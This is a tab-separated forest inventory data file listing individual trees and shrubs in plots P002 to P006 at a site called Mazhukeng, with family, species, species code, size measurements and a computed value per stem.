Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	4	1.8	0.00184878
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	4.5	2	0.0020762
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	4.5	2.5	0.00356116
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	5	2.1	0.00395057
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	5	2.5	0.00395057
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	5	1.6	0.00600364
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	5	2	0.00600364
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	5	2	0.00600364
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	5	1.5	0.00600364
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	3	6	2.5	0.00275631
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	4	6	4	0.00472771
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	5	6	4	0.00718464
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	9	7	2	0.0251831
Mazhukeng	1	P002	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	9	7	1.5	0.0251831
Mazhukeng	1	P002	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	5	2.5	0.00600364
Mazhukeng	1	P002	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	5.5	2.5	0.00928302
Mazhukeng	1	P002	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	24	9	1.4	0.203009
Mazhukeng	1	P002	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	2.5	4	3	0.00131335
Mazhukeng	1	P002	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	3	5	3.5	0.00230323
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3	2.1	0.000650978
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3	1.5	0.000650978
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2.5	3	1.5	0.000989284
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.5	3.5	2	0.000441757
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3.5	1.5	0.000757716
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3.5	2	0.000757716
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3.5	2	0.000757716
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3.5	1.5	0.000757716
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	3.5	1.7	0.00162093
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	4	3.5	1.8	0.00278028
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	4	1.3	0.000864223
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	4	1.8	0.000864223
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	4	1.4	0.000864223
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	4	4	0.7	0.00317108
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	4.5	2.6	0.00097053
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	5	2.5	0.00230323
Mazhukeng	1	P002	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	5	2.6	0.00230323
Mazhukeng	1	P003	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	2	4.5	0.5	0.00097053
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	2.5	2	0.000317142
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	1.5	0.000177413
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	1.5	0.000379528
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	2	0.000379528
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	1.5	0.000379528
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.3	0.000650978
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	2	0.000650978
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	0.8	0.000650978
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	0.5	0.000650978
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	0.8	0.000650978
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1	0.000757716
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.8	0.000757716
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.5	0.000757716
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.8	0.000757716
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.6	0.000757716
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.5	0.000757716
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	1.7	0.00162093
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	1.7	0.00162093
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	1	0.00162093
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	1.5	0.00162093
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	1.7	0.00162093
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	1.4	0.00162093
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	2	0.00162093
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	2.1	0.00184878
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	4	2	0.00317108
Mazhukeng	1	P003	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	4.5	1.7	0.00356116
Mazhukeng	1	P003	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3	3.5	1.5	0.00162093
Mazhukeng	1	P003	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2.5	1.6	0.000317142
Mazhukeng	1	P003	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	3	1.5	0.000379528
Mazhukeng	1	P003	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	2	4	2.5	0.000864223
Mazhukeng	1	P003	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	3	6.5	4	0.00298241
Mazhukeng	1	P003	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	2.5	3.5	1.8	0.00115149
Mazhukeng	1	P003	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	2	4	2	0.000864223
Mazhukeng	1	P003	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	13	11	7	0.0783376
Mazhukeng	1	P003	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	12	2.5	0.157128
Mazhukeng	1	P003	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	12	3	0.157128
Mazhukeng	1	P003	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	21	12	6	0.209803
Mazhukeng	1	P003	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	4	6	3	0.00472771
Mazhukeng	1	P003	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	8	9	5	0.0258628
Mazhukeng	1	P003	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	10	10	7.5	0.0436013
Mazhukeng	1	P003	Thymelaeaceae	Aquilaria	Aquilaria sinensis (Lour.) Gilg.	AQUSIN	13	11	7	0.0783376
Mazhukeng	1	P003	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	7	1.5	0.00550289
Mazhukeng	1	P003	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	7	4	0.00836267
Mazhukeng	1	P003	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7	2.4	0.0201917
Mazhukeng	1	P003	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	8	3.5	0.0230299
Mazhukeng	1	P003	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	9	8	1.4	0.0287229
Mazhukeng	1	P003	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	8.5	3	0.024447
Mazhukeng	1	P003	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	20	8.5	1.4	0.136321
Mazhukeng	1	P003	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	9	1.8	0.0393034
Mazhukeng	1	P003	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	11	9	3.5	0.0469961
Mazhukeng	1	P003	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	13	9	2.8	0.0642881
Mazhukeng	1	P003	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	13	9	2.5	0.0642881
Mazhukeng	1	P003	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	20	9	1.5	0.144215
Mazhukeng	1	P003	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	12	9.5	4	0.0583529
Mazhukeng	1	P003	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	17	10	1.5	0.117952
Mazhukeng	1	P003	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.5	3	2.2	0.000379528
Mazhukeng	1	P003	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3.5	1.5	0.000757716
Mazhukeng	1	P003	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3.5	2	0.000757716
Mazhukeng	1	P003	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	3.5	1.2	0.000757716
Mazhukeng	1	P003	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	3	4	1.5	0.00184878
Mazhukeng	1	P004	Euphorbiaceae	Glochidion	Glochidion wrightii Benth.	GLOWRI	6	7	2.5	0.011772
Mazhukeng	1	P004	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.8	0.000757716
Mazhukeng	1	P004	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.5	0.000757716
Mazhukeng	1	P004	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4	2	0.000503852
Mazhukeng	1	P004	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4	2	0.000503852
Mazhukeng	1	P004	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	1.4	0.000864223
Mazhukeng	1	P004	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	1.8	0.000864223
Mazhukeng	1	P004	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4.5	2.5	0.000565831
Mazhukeng	1	P004	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4.5	2	0.00097053
Mazhukeng	1	P004	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4.5	1.8	0.00097053
Mazhukeng	1	P004	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	5	2	0.00395057
Mazhukeng	1	P004	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2	4	3	0.000864223
Mazhukeng	1	P004	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2	4	3	0.000864223
Mazhukeng	1	P004	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	5	3.2	0.00230323
Mazhukeng	1	P004	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2	2.2	0.4	0.000479616
Mazhukeng	1	P004	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	4	2.5	0.00184878
Mazhukeng	1	P004	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	4.5	0.8	0.0020762
Mazhukeng	1	P004	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	4.5	1.3	0.00356116
Mazhukeng	1	P004	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	6	2	0.00472771
Mazhukeng	1	P004	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	7	2.3	0.011772
Mazhukeng	1	P004	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	8	2.1	0.0134267
Mazhukeng	1	P004	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	3	1.2	0.000177413
Mazhukeng	1	P004	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	9	9	5.5	0.0322561
Mazhukeng	1	P004	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	9	10	4.5	0.0357834
Mazhukeng	1	P004	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	10	4.5	0.0613767
Mazhukeng	1	P004	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	10	6	0.0819525
Mazhukeng	1	P004	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	11	3.8	0.0900186
Mazhukeng	1	P004	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	23	12	4.5	0.248834
Mazhukeng	1	P004	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	6	2.5	0.00472771
Mazhukeng	1	P004	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	6	2.7	0.00472771
Mazhukeng	1	P004	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	7	3.2	0.0157184
Mazhukeng	1	P004	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	7	2.5	0.0157184
Mazhukeng	1	P004	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3.5	7.5	4	0.004585
Mazhukeng	1	P004	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	9	7.5	4	0.0269539
Mazhukeng	1	P004	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	8	4	0.0134267
Mazhukeng	1	P004	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	10	8.5	2.8	0.0371518
Mazhukeng	1	P004	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	6	5	3.8	0.00845122
Mazhukeng	1	P004	Anacardiaceae	Toxicodendron	Toxicodendron succedaneum (L.) O.Kuntze	TOXSUC	2	7	3	0.00149971
Mazhukeng	1	P004	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1.5	2	1.4	0.000254566
Mazhukeng	1	P004	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	4	8	4.5	0.00627639
Mazhukeng	1	P005	Alangiaceae	Alangium	Alangium chinense (Lour.) Harms	ALACHI	8	7	1.5	0.0201917
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	2.5	0.000177413
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	1.5	0.000379528
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3	2	0.000379528
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.8	0.000650978
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.5	0.000650978
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	0.7	0.000650978
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.1	0.000650978
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3.5	2	0.000206502
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3.5	2	0.000206502
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3.5	1.8	0.000441757
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	3.5	1.7	0.000441757
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	2	0.000757716
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	2	0.000757716
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	2.3	0.00162093
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3.5	2	0.00162093
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4	2	0.000503852
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	1.6	0.000864223
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	1.3	0.000864223
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	2.5	0.000864223
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	2.5	0.000864223
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	2	0.000864223
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	4	2	0.00131335
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4	1.3	0.00184878
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3.5	4	2	0.00246856
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	4.5	2	0.0020762
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	3.5	0.00230323
Mazhukeng	1	P005	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	2.7	0.00230323
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2	3	2.1	0.000650978
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2	3	2	0.000650978
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	4	3.5	2.4	0.00278028
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	1.5	4	2	0.000503852
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2	4	2.8	0.000864223
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2.5	4	1.5	0.00131335
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	4	1.5	0.00184878
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	7	4	7	0.00905786
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	2	5	3	0.00107666
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3.5	5	3	0.00307536
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	6	2.5	0.00275631
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	6	3.2	0.00275631
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	3	7	3.5	0.00320825
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	4	7	3.5	0.00550289
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	5	7	4	0.00836267
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	5	7	3	0.00836267
Mazhukeng	1	P005	Hypericaceae	Cratoxylum	Cratoxylum ligustrinum (Spach) Bl.	CRALIG	6	7	2	0.011772
Mazhukeng	1	P005	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	10	8	1.4	0.0349983
Mazhukeng	1	P005	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	11	9	4	0.0469961
Mazhukeng	1	P005	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	4	3	0.00184878
Mazhukeng	1	P005	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	4	3	0.00184878
Mazhukeng	1	P005	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	4.5	3	0.0020762
Mazhukeng	1	P005	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	5	3.5	0.00230323
Mazhukeng	1	P005	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	5	2.5	0.00230323
Mazhukeng	1	P005	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	6	3.5	0.00472771
Mazhukeng	1	P005	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	6	4	0.00472771
Mazhukeng	1	P005	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	5	6	3.5	0.00718464
Mazhukeng	1	P005	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	8	4	0.0179278
Mazhukeng	1	P005	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	9	3	0.0201331
Mazhukeng	1	P005	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	9	10	9	0.0357834
Mazhukeng	1	P005	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	10	4	0.0436013
Mazhukeng	1	P005	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	12	10	3.5	0.0613767
Mazhukeng	1	P005	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	2	1	0.000118999
Mazhukeng	1	P005	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	3	2	0.000379528
Mazhukeng	1	P005	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	3.5	2.5	0.00162093
Mazhukeng	1	P005	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	4	2.4	0.000864223
Mazhukeng	1	P005	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	4.5	2	0.0020762
Mazhukeng	1	P005	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	3	5	2.8	0.00230323
Mazhukeng	1	P005	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	4	5	2.5	0.00395057
Mazhukeng	1	P005	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	4	5	3.2	0.00395057
Mazhukeng	1	P005	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	6	6	3.5	0.0101137
Mazhukeng	1	P005	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	7	7	4	0.0157184
Mazhukeng	1	P005	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	10	3.5	0.0286909
Mazhukeng	1	P005	Daphniphyllaceae	Daphniphyllum	Daphniphyllum calycinum Benth.	DAPCAL	1	4	2	0.000235529
Mazhukeng	1	P005	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3	5	3	0.00230323
Mazhukeng	1	P005	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	6	3.5	0.0101137
Mazhukeng	1	P005	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6	4	0.0135042
Mazhukeng	1	P005	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	7	1.5	0.0157184
Mazhukeng	1	P005	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	7	3	0.0201917
Mazhukeng	1	P005	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	6	8	5.5	0.0134267
Mazhukeng	1	P005	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	9	5	0.0201331
Mazhukeng	1	P005	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	9	4.8	0.0258628
Mazhukeng	1	P005	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	8	9	4.8	0.0258628
Mazhukeng	1	P005	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	1.5	3	1.8	0.000379528
Mazhukeng	1	P005	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	3.5	1.8	0.00162093
Mazhukeng	1	P006	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	2.5	1	0.00014825
Mazhukeng	1	P006	Euphorbiaceae	Bridelia	Bridelia fordii Hemsl.	BRIFOR	5	3.5	2.5	0.00422516
